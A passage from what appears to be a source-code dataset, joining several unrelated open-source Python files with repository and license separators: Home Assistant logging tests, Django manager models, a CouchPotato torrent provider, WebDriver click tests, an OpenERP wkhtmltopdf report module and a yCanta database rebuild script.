                system_log.DOMAIN, system_log.SERVICE_WRITE,
                {'message': 'test_message'}))
        await hass.async_block_till_done()
    # Without an explicit logger, the service writes to the component's
    # "external" logger at the default ERROR level.
    mock_logging.assert_called_once_with(
        'homeassistant.components.system_log.external')
    assert logger.method_calls[0] == ('error', ('test_message',))


async def test_write_choose_logger(hass):
    """Test that correct logger is chosen."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    with patch('logging.getLogger') as mock_logging:
        hass.async_add_job(
            hass.services.async_call(
                system_log.DOMAIN, system_log.SERVICE_WRITE,
                {'message': 'test_message',
                 'logger': 'myLogger'}))
        await hass.async_block_till_done()
    # The 'logger' service field overrides the default logger name.
    mock_logging.assert_called_once_with(
        'myLogger')


async def test_write_choose_level(hass):
    """Test that correct logger is chosen."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    logger = MagicMock()
    with patch('logging.getLogger', return_value=logger):
        hass.async_add_job(
            hass.services.async_call(
                system_log.DOMAIN, system_log.SERVICE_WRITE,
                {'message': 'test_message',
                 'level': 'debug'}))
        await hass.async_block_till_done()
    # The 'level' service field selects the logger method that is invoked.
    assert logger.method_calls[0] == ('debug', ('test_message',))
async def test_unknown_path(hass, hass_client):
    """Test error logged from unknown path."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    # Force the logger to report a caller outside any known source root.
    _LOGGER.findCaller = MagicMock(
        return_value=('unknown_path', 0, None, None))
    _LOGGER.error('error message')
    log = (await get_error_log(hass, hass_client, 1))[0]
    # Unknown paths are passed through unmodified.
    assert log['source'] == 'unknown_path'


def log_error_from_test_path(path):
    """Log error while mocking the path."""
    call_path = 'internal_path.py'
    # Patch both the logger's caller lookup and the traceback so the
    # component resolves *path* as the error's origin frame.
    with patch.object(_LOGGER,
                      'findCaller',
                      MagicMock(return_value=(call_path, 0, None, None))):
        with patch('traceback.extract_stack',
                   MagicMock(return_value=[
                       get_frame('main_path/main.py'),
                       get_frame(path),
                       get_frame(call_path),
                       get_frame('venv_path/logging/log.py')])):
            _LOGGER.error('error message')
async def test_homeassistant_path(hass, hass_client):
    """Test error logged from homeassistant path."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    with patch('homeassistant.components.system_log.HOMEASSISTANT_PATH',
               new=['venv_path/homeassistant']):
        log_error_from_test_path(
            'venv_path/homeassistant/component/component.py')
    log = (await get_error_log(hass, hass_client, 1))[0]
    # The homeassistant install prefix is stripped from the source.
    assert log['source'] == 'component/component.py'


async def test_config_path(hass, hass_client):
    """Test error logged from config path."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    with patch.object(hass.config, 'config_dir', new='config'):
        log_error_from_test_path('config/custom_component/test.py')
    log = (await get_error_log(hass, hass_client, 1))[0]
    # The config directory prefix is stripped from the source.
    assert log['source'] == 'custom_component/test.py'


async def test_netdisco_path(hass, hass_client):
    """Test error logged from netdisco path."""
    await async_setup_component(hass, system_log.DOMAIN, BASIC_CONFIG)
    with patch.dict('sys.modules',
                    netdisco=MagicMock(__path__=['venv_path/netdisco'])):
        log_error_from_test_path('venv_path/netdisco/disco_component.py')
    log = (await get_error_log(hass, hass_client, 1))[0]
    # The netdisco package path is stripped from the source.
    assert log['source'] == 'disco_component.py'
|
apache-2.0
|
wraiden/spacewalk
|
client/rhel/rhn-client-tools/src/actions/hardware.py
|
3
|
1142
|
#!/usr/bin/python
# Copyright (c) 1999--2016 Red Hat, Inc. Distributed under GPLv2.
#
# Author: Adrian Likins <[email protected]>
# imports are a bit weird here to avoid name collions on "harware"
import sys
sys.path.append("/usr/share/rhn/")
from up2date_client import hardware
from up2date_client import up2dateAuth
from up2date_client import rpcServer
argVerbose = 0
__rhnexport__ = [
'refresh_list' ]
# resync hardware information with the server profile
def refresh_list(cache_only=None):
    """Re-send the full hardware profile to the RHN server.

    Returns an up2date action status tuple (code, message, data):
    0 on success, 12 when the upload fails.
    """
    if cache_only:
        # Nothing to cache for this action; report success without
        # contacting the server.
        return (0, "no-ops for caching", {})

    # read all hardware in
    hardwareList = hardware.Hardware()
    s = rpcServer.getServer()

    if argVerbose > 1:
        print("Called refresh_hardware")

    try:
        s.registration.refresh_hw_profile(up2dateAuth.getSystemId(),
                                          hardwareList)
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; narrowed while keeping the best-effort return.
        print("ERROR: sending hardware database for System Profile")
        return (12, "Error refreshing system hardware", {})

    return (0, "hardware list refreshed", {})
def main():
    """CLI entry point: run the refresh action and print its status tuple."""
    print(refresh_list())


if __name__ == "__main__":
    main()
|
gpl-2.0
|
risicle/django
|
tests/managers_regress/models.py
|
245
|
3566
|
"""
Various edge-cases for model managers.
"""
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
class OnlyFred(models.Manager):
    """Manager restricted to rows whose name is 'fred'."""

    def get_queryset(self):
        return super(OnlyFred, self).get_queryset().filter(name='fred')


class OnlyBarney(models.Manager):
    """Manager restricted to rows whose name is 'barney'."""

    def get_queryset(self):
        return super(OnlyBarney, self).get_queryset().filter(name='barney')


class Value42(models.Manager):
    """Manager restricted to rows whose value is 42."""

    def get_queryset(self):
        return super(Value42, self).get_queryset().filter(value=42)
class AbstractBase1(models.Model):
    """Abstract base contributing two custom managers plus `objects`."""
    name = models.CharField(max_length=50)

    class Meta:
        abstract = True

    # Custom managers
    manager1 = OnlyFred()
    manager2 = OnlyBarney()
    objects = models.Manager()


class AbstractBase2(models.Model):
    """Abstract base contributing a single filtering manager."""
    value = models.IntegerField()

    class Meta:
        abstract = True

    # Custom manager
    restricted = Value42()


# No custom manager on this class to make sure the default case doesn't break.
class AbstractBase3(models.Model):
    comment = models.CharField(max_length=50)

    class Meta:
        abstract = True
@python_2_unicode_compatible
class Parent(models.Model):
    """Concrete model with a single custom manager as the default."""
    name = models.CharField(max_length=50)

    manager = OnlyFred()

    def __str__(self):
        return self.name


# Managers from base classes are inherited and, if no manager is specified
# *and* the parent has a manager specified, the first one (in the MRO) will
# become the default.
@python_2_unicode_compatible
class Child1(AbstractBase1):
    """Inherits manager1/manager2/objects from AbstractBase1."""
    data = models.CharField(max_length=25)

    def __str__(self):
        return self.data


@python_2_unicode_compatible
class Child2(AbstractBase1, AbstractBase2):
    """Inherits managers from two abstract bases (diamond-free MRO)."""
    data = models.CharField(max_length=25)

    def __str__(self):
        return self.data


@python_2_unicode_compatible
class Child3(AbstractBase1, AbstractBase3):
    """One base with managers, one without."""
    data = models.CharField(max_length=25)

    def __str__(self):
        return self.data


@python_2_unicode_compatible
class Child4(AbstractBase1):
    data = models.CharField(max_length=25)

    # Should be the default manager, although the parent managers are
    # inherited.
    default = models.Manager()

    def __str__(self):
        return self.data


@python_2_unicode_compatible
class Child5(AbstractBase3):
    """Declares its own managers; base contributes none."""
    name = models.CharField(max_length=25)

    default = OnlyFred()
    objects = models.Manager()

    def __str__(self):
        return self.name


# Will inherit managers from AbstractBase1, but not Child4.
class Child6(Child4):
    value = models.IntegerField()


# Will not inherit default manager from parent.
class Child7(Parent):
    pass
# RelatedManagers
@python_2_unicode_compatible
class RelatedModel(models.Model):
    """Target model for FK/M2M/generic relations in related-manager tests."""
    test_gfk = GenericRelation('RelationModel', content_type_field='gfk_ctype', object_id_field='gfk_id')
    exact = models.NullBooleanField()

    def __str__(self):
        return force_text(self.pk)


@python_2_unicode_compatible
class RelationModel(models.Model):
    """Model holding one of each relation kind back to RelatedModel."""
    fk = models.ForeignKey(RelatedModel, models.CASCADE, related_name='test_fk')
    m2m = models.ManyToManyField(RelatedModel, related_name='test_m2m')
    gfk_ctype = models.ForeignKey(ContentType, models.SET_NULL, null=True)
    gfk_id = models.IntegerField(null=True)
    gfk = GenericForeignKey(ct_field='gfk_ctype', fk_field='gfk_id')

    def __str__(self):
        return force_text(self.pk)
|
bsd-3-clause
|
bverburg/CouchPotatoServer
|
couchpotato/core/media/_base/providers/torrent/hdbits.py
|
45
|
4648
|
import re
import json
import traceback
from couchpotato.core.helpers.variable import tryInt, getIdentifier
from couchpotato.core.logger import CPLog
from couchpotato.core.media._base.providers.torrent.base import TorrentProvider
log = CPLog(__name__)
class Base(TorrentProvider):
    """Torrent provider backed by the HDBits JSON API."""

    urls = {
        'test': 'https://hdbits.org/',
        'detail': 'https://hdbits.org/details.php?id=%s',
        'download': 'https://hdbits.org/download.php?id=%s&passkey=%s',
        'api': 'https://hdbits.org/api/torrents'
    }

    http_time_between_calls = 1  # Seconds

    def _post_query(self, **params):
        """POST a JSON query to the API.

        Returns the list of result dicts on success, None on any failure.
        """
        post_data = {
            'username': self.conf('username'),
            'passkey': self.conf('passkey')
        }
        post_data.update(params)

        if self.conf('internal_only'):
            # origin=1 restricts results to HDBits internal releases.
            post_data.update({'origin': [1]})

        try:
            result = self.getJsonData(self.urls['api'], data = json.dumps(post_data))

            if result:
                if result['status'] != 0:
                    log.error('Error searching hdbits: %s' % result['message'])
                else:
                    return result['data']
        except Exception:
            # Was a bare `except: pass`; narrowed so SystemExit and
            # KeyboardInterrupt are no longer swallowed, and the failure is
            # logged instead of vanishing silently.
            log.error('Failed searching hdbits: %s', traceback.format_exc())

        return None

    def _search(self, movie, quality, results):
        """Search by IMDB id and append release dicts to `results`."""
        identifier = getIdentifier(movie)
        match = re.match(r'tt(\d{7})', identifier)
        if not match:
            # Guard: a non-IMDB identifier previously crashed with
            # AttributeError on match.group(1).
            log.error('Could not extract an IMDB id from %s', identifier)
            return

        data = self._post_query(imdb = {'id': match.group(1)})

        if data:
            try:
                for result in data:
                    results.append({
                        'id': result['id'],
                        'name': result['name'],
                        'url': self.urls['download'] % (result['id'], self.conf('passkey')),
                        'detail_url': self.urls['detail'] % result['id'],
                        # API reports bytes; CouchPotato expects megabytes.
                        'size': tryInt(result['size']) / 1024 / 1024,
                        'seeders': tryInt(result['seeders']),
                        'leechers': tryInt(result['leechers'])
                    })
            except Exception:
                log.error('Failed getting results from %s: %s', (self.getName(), traceback.format_exc()))
config = [{
'name': 'hdbits',
'groups': [
{
'tab': 'searcher',
'list': 'torrent_providers',
'name': 'HDBits',
'wizard': True,
'description': '<a href="http://hdbits.org">HDBits</a>',
'icon': 'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAABi0lEQVR4AZWSzUsbQRjGdyabTcvSNPTSHlpQQeMHJApC8CJRvHgQQU969+LJP8G7f4N3DwpeFRQvRr0EKaUl0ATSpkigUNFsMl/r9NmZLCEHA/nNO5PfvMPDm0DI6fV3ZxiolEICe1oZCBVCCmBPKwOh2ErKBHGE4KYEXBpSLkUlqO4LcM7f+6nVhRnOhSkOz/hexk+tL+YL0yPF2YmN4tynD++4gTLGkNNac9YFLoREBR1+cnF3dFY6v/m6PD+FaXiNJtgA4xYbABxiGrz6+6HWaI5/+Qh37YS0/3Znc8UxwNGBIIBX22z+/ZdJ+4wzyjpR4PEpODg8tgUXBv2iWUzSpa12B0IR6n6lvt8Aek2lZHb084+fdRNgrwY8z81PjhVy2d2ttUrtV/lbBa+JXGEpDMPnoF2tN1QYRqVUtf6nFbThb7wk7le395elcqhASLb39okDiHY00VCtCTEHwSiH4AI0lkOiT1dwMeSfT3SRxiQWNO7Zwj1egkoVIQFMKvSiC3bcjXq9Jf8DcDIRT3hh10kAAAAASUVORK5CYII=',
'options': [
{
'name': 'enabled',
'type': 'enabler',
'default': False,
},
{
'name': 'username',
'default': '',
},
{
'name': 'passkey',
'default': '',
},
{
'name': 'seed_ratio',
'label': 'Seed ratio',
'type': 'float',
'default': 1,
'description': 'Will not be (re)moved until this seed ratio is met.',
},
{
'name': 'seed_time',
'label': 'Seed time',
'type': 'int',
'default': 40,
'description': 'Will not be (re)moved until this seed time (in hours) is met.',
},
{
'name': 'extra_score',
'advanced': True,
'label': 'Extra Score',
'type': 'int',
'default': 0,
'description': 'Starting score for each release found via this provider.',
},
{
'name': 'internal_only',
'advanced': True,
'label': 'Internal Only',
'type': 'bool',
'default': False,
'description': 'Only download releases marked as HDBits internal'
}
],
},
],
}]
|
gpl-3.0
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/contracts/testing/utils.py
|
3
|
1693
|
from ..interface import (ContractSyntaxError, describe_value,
ContractNotRespected)
from ..main import parse_contract_string, check_contracts
def check_contracts_ok(contract, value):
    """ Check that `value` satisfies `contract`; raises on violation. """
    if isinstance(contract, str):
        # Normalize the single-contract form to the list form.
        contract = [contract]
        value = [value]
    context = check_contracts(contract, value)
    assert isinstance(context, dict)
    # Smoke-test that the returned context can be formatted as str and repr.
    "%s" % context
    "%r" % context
def check_contracts_fail(contract, value, error=ContractNotRespected):
    """ Check that `value` violates `contract`.

        Returns the raised exception; raises a plain Exception with a
        diagnostic message if the contract is unexpectedly satisfied.
    """
    if isinstance(contract, str):
        # Normalize the single-contract form to the list form.
        contract = [contract]
        value = [value]

    try:
        context = check_contracts(contract, value)

        # Reaching this point means the contract was satisfied -- a failure
        # for this helper. (Fixed doubled negation "not not" in the message.)
        msg = ('I was expecting that the values would not'
               ' satisfy the contract.\n')
        for v in value:
            msg += '  value: %s\n' % describe_value(v)

        for c in contract:
            cp = parse_contract_string(c)
            msg += '  contract: %r, parsed as %r (%s)\n' % (c, cp, cp)

        msg += '  context: %r\n' % context
        raise Exception(msg)

    except error as e:
        # Try generation of strings:
        s = "%r" % e  # @UnusedVariable
        s = "%s" % e  # @UnusedVariable
        return e
def check_syntax_fail(string):
    """ Check that `string` is rejected by the contract parser. """
    assert isinstance(string, str)

    try:
        parsed_contract = parse_contract_string(string)
        # Parsing succeeded, which is a failure for this helper.
        msg = 'I would not expect to parse %r.' % string
        msg += ' contract: %s\n' % parsed_contract
        raise Exception(msg)

    except ContractSyntaxError as e:
        # Try generation of strings:
        s = "%r" % e  # @UnusedVariable
        s = "%s" % e  # @UnusedVariable
        pass
|
agpl-3.0
|
splav/servo
|
tests/wpt/web-platform-tests/webdriver/tests/element_click/interactability.py
|
20
|
3922
|
import pytest
from tests.support.asserts import assert_error, assert_success
from tests.support.inline import inline
def element_click(session, element):
    """POST the WebDriver "Element Click" command for *element* and return
    the raw transport response."""
    return session.transport.send(
        "POST", "session/{session_id}/element/{element_id}/click".format(
            session_id=session.session_id,
            element_id=element.id))
def test_display_none(session):
    # display:none removes the element from rendering -> not interactable.
    session.url = inline("""<button style="display: none">foobar</button>""")
    element = session.find.css("button", all=False)

    response = element_click(session, element)
    assert_error(response, "element not interactable")


def test_visibility_hidden(session):
    # visibility:hidden keeps layout but hides the element -> not interactable.
    session.url = inline("""<button style="visibility: hidden">foobar</button>""")
    element = session.find.css("button", all=False)

    response = element_click(session, element)
    assert_error(response, "element not interactable")


def test_hidden(session):
    # The HTML `hidden` attribute behaves like display:none.
    session.url = inline("<button hidden>foobar</button>")
    element = session.find.css("button", all=False)

    response = element_click(session, element)
    assert_error(response, "element not interactable")


def test_disabled(session):
    # A disabled button is still rendered and clickable per spec; the click
    # succeeds even though it does not activate the control.
    session.url = inline("""<button disabled>foobar</button>""")
    element = session.find.css("button", all=False)

    response = element_click(session, element)
    assert_success(response)
@pytest.mark.parametrize("transform", ["translate(-100px, -100px)", "rotate(50deg)"])
def test_element_not_interactable_css_transform(session, transform):
    # The transform moves the input's in-view center point away, so the
    # click target cannot be scrolled into view.
    session.url = inline("""
        <div style="width: 500px; height: 100px;
            background-color: blue; transform: {transform};">
        <input type=button>
        </div>""".format(transform=transform))
    element = session.find.css("input", all=False)
    response = element_click(session, element)
    assert_error(response, "element not interactable")


def test_element_not_interactable_out_of_view(session):
    # Negative margin pushes the input a full viewport height off-screen.
    session.url = inline("""
        <style>
        input {
          position: absolute;
          margin-top: -100vh;
          background: red;
        }
        </style>

        <input>
        """)
    element = session.find.css("input", all=False)
    response = element_click(session, element)
    assert_error(response, "element not interactable")


@pytest.mark.parametrize("tag_name", ["div", "span"])
def test_zero_sized_element(session, tag_name):
    # An empty div/span has no box, hence no clickable point.
    session.url = inline("<{0}></{0}>".format(tag_name))
    element = session.find.css(tag_name, all=False)

    response = element_click(session, element)
    assert_error(response, "element not interactable")
def test_element_intercepted(session):
session.url = inline("""
<style>
div {
position: absolute;
height: 100vh;
width: 100vh;
background: blue;
top: 0;
left: 0;
}
</style>
<input type=button value=Roger>
<div></div>
""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element click intercepted")
def test_element_intercepted_no_pointer_events(session):
session.url = inline("""<input type=button value=Roger style="pointer-events: none">""")
element = session.find.css("input", all=False)
response = element_click(session, element)
assert_error(response, "element click intercepted")
def test_element_not_visible_overflow_hidden(session):
    """An input pushed below a container with overflow: hidden is clipped
    away entirely, so it is not interactable."""
    session.url = inline("""
        <style>
        div {
          overflow: hidden;
          height: 50px;
          background: green;
        }

        input {
          margin-top: 100px;
          background: red;
        }
        </style>

        <div><input></div>
        """)
    hidden = session.find.css("input", all=False)
    result = element_click(session, hidden)
    assert_error(result, "element not interactable")
|
mpl-2.0
|
tedi3231/openerp
|
build/lib/openerp/addons/report_webkit/webkit_report.py
|
4
|
14795
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010 Camptocamp SA (http://www.camptocamp.com)
# All Right Reserved
#
# Author : Nicolas Bessi (Camptocamp)
# Contributor(s) : Florent Xicluna (Wingo SA)
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contact a Free Software
# Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import subprocess
import os
import sys
from openerp import report
import tempfile
import time
import logging
from mako.template import Template
from mako.lookup import TemplateLookup
from mako import exceptions
from openerp import netsvc
from openerp import pooler
from report_helper import WebKitHelper
from openerp.report.report_sxw import *
from openerp import addons
from openerp import tools
from openerp.tools.translate import _
from openerp.osv.osv import except_osv
_logger = logging.getLogger(__name__)
def mako_template(text):
    """Compile *text* into a Mako template configured for UTF-8 input/output.

    A dedicated ``TemplateLookup`` is attached so templates may use
    ``<%include/>`` and ``<%inherit/>`` directives.
    """
    lookup = TemplateLookup()
    return Template(
        text,
        input_encoding='utf-8',
        output_encoding='utf-8',
        lookup=lookup,
    )
class WebKitParser(report_sxw):
    """Custom report class that uses WebKit (wkhtmltopdf) to render HTML reports.

    Code partially taken from report openoffice. Thanks guys :)
    """
    def __init__(self, name, table, rml=False, parser=False,
        header=True, store=False):
        # parser_instance/localcontext are (re)assigned per render in
        # create_single_pdf().
        self.parser_instance = False
        self.localcontext = {}
        report_sxw.__init__(self, name, table, rml, parser,
            header, store)

    def get_lib(self, cursor, uid):
        """Return the lib wkhtml path.

        Reads the ``webkit_path`` ir.config_parameter; if unset, falls back
        to searching the system PATH (plus the current directory for frozen
        builds and the directory above the configured server root).

        Raises except_osv when no wkhtmltopdf executable can be located.
        """
        proxy = self.pool.get('ir.config_parameter')
        webkit_path = proxy.get_param(cursor, uid, 'webkit_path')
        if not webkit_path:
            try:
                defpath = os.environ.get('PATH', os.defpath).split(os.pathsep)
                if hasattr(sys, 'frozen'):
                    defpath.append(os.getcwd())
                if tools.config['root_path']:
                    defpath.append(os.path.dirname(tools.config['root_path']))
                webkit_path = tools.which('wkhtmltopdf', path=os.pathsep.join(defpath))
            except IOError:
                webkit_path = None
        if webkit_path:
            return webkit_path
        raise except_osv(
                         _('Wkhtmltopdf library path is not set'),
                         _('Please install executable on your system' \
                         ' (sudo apt-get install wkhtmltopdf) or download it from here:' \
                         ' http://code.google.com/p/wkhtmltopdf/downloads/list and set the' \
                         ' path in the ir.config_parameter with the webkit_path key.' \
                         'Minimal version is 0.9.9')
                        )

    def generate_pdf(self, comm_path, report_xml, header, footer, html_list, webkit_header=False):
        """Call webkit in order to generate pdf.

        Writes header/footer/body HTML to temporary files, builds a
        wkhtmltopdf command line from the webkit_header record's layout
        options, runs it, and returns the resulting PDF bytes.  All
        temporary files are deleted in the finally block.
        """
        if not webkit_header:
            webkit_header = report_xml.webkit_header
        tmp_dir = tempfile.gettempdir()
        out_filename = tempfile.mktemp(suffix=".pdf", prefix="webkit.tmp.")
        # Every temp file created below is tracked here for cleanup.
        file_to_del = [out_filename]
        if comm_path:
            command = [comm_path]
        else:
            command = ['wkhtmltopdf']

        command.append('--quiet')
        # default to UTF-8 encoding.  Use <meta charset="latin-1"> to override.
        command.extend(['--encoding', 'utf-8'])
        if header :
            head_file = file( os.path.join(
                                  tmp_dir,
                                  str(time.time()) + '.head.html'
                                 ),
                                'w'
                            )
            head_file.write(header)
            head_file.close()
            file_to_del.append(head_file.name)
            command.extend(['--header-html', head_file.name])
        if footer :
            foot_file = file(  os.path.join(
                                  tmp_dir,
                                  str(time.time()) + '.foot.html'
                                 ),
                                'w'
                            )
            foot_file.write(footer)
            foot_file.close()
            file_to_del.append(foot_file.name)
            command.extend(['--footer-html', foot_file.name])

        # Margin/orientation/format values come from the webkit_header record;
        # commas are normalized to dots for locales using decimal commas.
        if webkit_header.margin_top :
            command.extend(['--margin-top', str(webkit_header.margin_top).replace(',', '.')])
        if webkit_header.margin_bottom :
            command.extend(['--margin-bottom', str(webkit_header.margin_bottom).replace(',', '.')])
        if webkit_header.margin_left :
            command.extend(['--margin-left', str(webkit_header.margin_left).replace(',', '.')])
        if webkit_header.margin_right :
            command.extend(['--margin-right', str(webkit_header.margin_right).replace(',', '.')])
        if webkit_header.orientation :
            command.extend(['--orientation', str(webkit_header.orientation).replace(',', '.')])
        if webkit_header.format :
            command.extend(['--page-size', str(webkit_header.format).replace(',', '.')])
        count = 0
        for html in html_list :
            html_file = file(os.path.join(tmp_dir, str(time.time()) + str(count) +'.body.html'), 'w')
            count += 1
            html_file.write(html)
            html_file.close()
            file_to_del.append(html_file.name)
            command.append(html_file.name)
        command.append(out_filename)
        # wkhtmltopdf's stderr is captured to a temp file for diagnostics.
        stderr_fd, stderr_path = tempfile.mkstemp(text=True)
        file_to_del.append(stderr_path)
        try:
            status = subprocess.call(command, stderr=stderr_fd)
            os.close(stderr_fd) # ensure flush before reading
            stderr_fd = None # avoid closing again in finally block
            fobj = open(stderr_path, 'r')
            error_message = fobj.read()
            fobj.close()
            if not error_message:
                error_message = _('No diagnosis message was provided')
            else:
                error_message = _('The following diagnosis message was provided:\n') + error_message
            if status :
                raise except_osv(_('Webkit error' ),
                                 _("The command 'wkhtmltopdf' failed with error code = %s. Message: %s") % (status, error_message))
            pdf_file = open(out_filename, 'rb')
            pdf = pdf_file.read()
            pdf_file.close()
        finally:
            if stderr_fd is not None:
                os.close(stderr_fd)
            for f_to_del in file_to_del:
                try:
                    os.unlink(f_to_del)
                except (OSError, IOError), exc:
                    _logger.error('cannot remove file %s: %s', f_to_del, exc)
        return pdf

    def translate_call(self, src):
        """Translate String.

        Looks *src* up in ir.translation for the render context's language
        ('report' translation type); returns *src* unchanged when no
        translation exists.
        """
        ir_translation = self.pool.get('ir.translation')
        res = ir_translation._get_source(self.parser_instance.cr, self.parser_instance.uid,
                                         None, 'report', self.parser_instance.localcontext.get('lang', 'en_US'), src)
        if not res :
            return src
        return res

    # override needed to keep the attachments storing procedure
    def create_single_pdf(self, cursor, uid, ids, data, report_xml, context=None):
        """generate the PDF.

        Renders the Mako body (one pass per record in precise mode, a single
        pass otherwise), then the header/footer templates, and delegates to
        generate_pdf().  With webkit_debug set, returns the rendered HTML
        instead of running wkhtmltopdf.
        Returns a (content, format) tuple: (pdf_bytes, 'pdf') or (html, 'html').
        """
        if context is None:
            context={}
        htmls = []
        # Non-webkit reports fall back to the standard rendering path.
        if report_xml.report_type != 'webkit':
            return super(WebKitParser,self).create_single_pdf(cursor, uid, ids, data, report_xml, context=context)

        self.parser_instance = self.parser(cursor,
                                           uid,
                                           self.name2,
                                           context=context)

        self.pool = pooler.get_pool(cursor.dbname)
        objs = self.getObjects(cursor, uid, ids, context)
        self.parser_instance.set_context(objs, data, ids, report_xml.report_type)

        # Template source: file on disk first, then the inline
        # report_webkit_data field.
        template =  False

        if report_xml.report_file :
            path = addons.get_module_resource(*report_xml.report_file.split(os.path.sep))
            if os.path.exists(path) :
                template = file(path).read()
        if not template and report_xml.report_webkit_data :
            template =  report_xml.report_webkit_data
        if not template :
            raise except_osv(_('Error!'), _('Webkit report template not found!'))
        header = report_xml.webkit_header.html
        footer = report_xml.webkit_header.footer_html
        if not header and report_xml.header:
            raise except_osv(
                  _('No header defined for this Webkit report!'),
                  _('Please set a header in company settings.')
              )
        if not report_xml.header :
            header = ''
            default_head = addons.get_module_resource('report_webkit', 'default_header.html')
            with open(default_head,'r') as f:
                header = f.read()
        css = report_xml.webkit_header.css
        if not css :
            css = ''

        #default_filters=['unicode', 'entity'] can be used to set global filter
        body_mako_tpl = mako_template(template)
        helper = WebKitHelper(cursor, uid, report_xml.id, context)
        # In precise mode each record is rendered separately (one HTML body
        # per record); otherwise a single body covers all records.
        if report_xml.precise_mode:
            for obj in objs:
                self.parser_instance.localcontext['objects'] = [obj]
                try :
                    html = body_mako_tpl.render(helper=helper,
                                                css=css,
                                                _=self.translate_call,
                                                **self.parser_instance.localcontext)
                    htmls.append(html)
                except Exception:
                    msg = exceptions.text_error_template().render()
                    _logger.error(msg)
                    raise except_osv(_('Webkit render!'), msg)
        else:
            try :
                html = body_mako_tpl.render(helper=helper,
                                            css=css,
                                            _=self.translate_call,
                                            **self.parser_instance.localcontext)
                htmls.append(html)
            except Exception:
                msg = exceptions.text_error_template().render()
                _logger.error(msg)
                raise except_osv(_('Webkit render!'), msg)
        head_mako_tpl = mako_template(header)
        try :
            head = head_mako_tpl.render(helper=helper,
                                        css=css,
                                        _=self.translate_call,
                                        _debug=False,
                                        **self.parser_instance.localcontext)
        except Exception:
            raise except_osv(_('Webkit render!'),
                exceptions.text_error_template().render())
        foot = False
        if footer :
            foot_mako_tpl = mako_template(footer)
            try :
                foot = foot_mako_tpl.render(helper=helper,
                                            css=css,
                                            _=self.translate_call,
                                            **self.parser_instance.localcontext)
            except:
                msg = exceptions.text_error_template().render()
                _logger.error(msg)
                raise except_osv(_('Webkit render!'), msg)
        if report_xml.webkit_debug :
            try :
                deb = head_mako_tpl.render(helper=helper,
                                           css=css,
                                           _debug=tools.ustr("\n".join(htmls)),
                                           _=self.translate_call,
                                           **self.parser_instance.localcontext)
            except Exception:
                msg = exceptions.text_error_template().render()
                _logger.error(msg)
                raise except_osv(_('Webkit render!'), msg)
            return (deb, 'html')
        bin = self.get_lib(cursor, uid)
        pdf = self.generate_pdf(bin, report_xml, head, foot, htmls)
        return (pdf, 'pdf')

    def create(self, cursor, uid, ids, data, context=None):
        """We override the create function in order to handle generator
           Code taken from report openoffice. Thanks guys :)
        """
        pool = pooler.get_pool(cursor.dbname)
        ir_obj = pool.get('ir.actions.report.xml')
        report_xml_ids = ir_obj.search(cursor, uid,
                [('report_name', '=', self.name[7:])], context=context)
        if report_xml_ids:

            report_xml = ir_obj.browse(cursor,
                                       uid,
                                       report_xml_ids[0],
                                       context=context)
            # Clear the rml/sxw fields on the in-memory record so the
            # webkit path is taken downstream.
            report_xml.report_rml = None
            report_xml.report_rml_content = None
            report_xml.report_sxw_content_data = None
            report_xml.report_sxw_content = None
            report_xml.report_sxw = None
        else:
            return super(WebKitParser, self).create(cursor, uid, ids, data, context)
        if report_xml.report_type != 'webkit' :
            return super(WebKitParser, self).create(cursor, uid, ids, data, context)
        result = self.create_source_pdf(cursor, uid, ids, data, report_xml, context)
        if not result:
            return (False,False)
        return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
yCanta/yCanta
|
regen_db.py
|
1
|
3115
|
#!/usr/bin/env python
from webapp.model import Song, Songbook, hub
try: # try c version for speed then fall back to python
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import xml.parsers.expat
import webapp.c_utilities as c
from posixpath import *
import turbogears
import glob
import sys
import os
import re
if exists('song.db'):
os.system('rm song.db')
print '\nREMOVED EXISTING DATABASE\n'
os.system('tg-admin -c prod.cfg sql create')
if exists(join(dirname(__file__), "setup.py")):
turbogears.update_config(configfile="dev.cfg",
modulename="webapp.config")
# grab all songs and songbooks from directories
songlist = glob.glob('songs/*')
songbooklist = glob.glob('songbooks/*')
# enter songs into database
hub.begin() #open connection to database
print '\n'
for song in songlist:
print 'Song:', song
path = song.replace('\\', '/')
try:
dom = ET.parse(path)
if dom.find('stitle') != None and dom.find('stitle').text != None: #don't die if no title
title = dom.find('stitle').text
else:
title = 'No title'
print 'NO TITLE:', path
if dom.find('author') != None and dom.find('author').text != None: #don't die if no author
author = dom.find('author').text
else:
author = ''
if dom.find('categories') != None and dom.find('categories').text != None: #don't die if no categories
categories = dom.find('categories').text
else:
categories = ''
if dom.find('copyright') != None and dom.find('copyright').text != None: #don't die if no copyright
copyright = dom.find('copyright').text
else:
copyright = ''
#this code is direct copy from db.py song_save
if dom.find('chunk/line') != None: #don't die if no content
content = ''
for line in dom.findall('chunk/line'):
content += re.sub('<c.*?c>', '', ET.tostring(line).replace('<line>',' ').replace('</line>',' '))
else:
content = ''
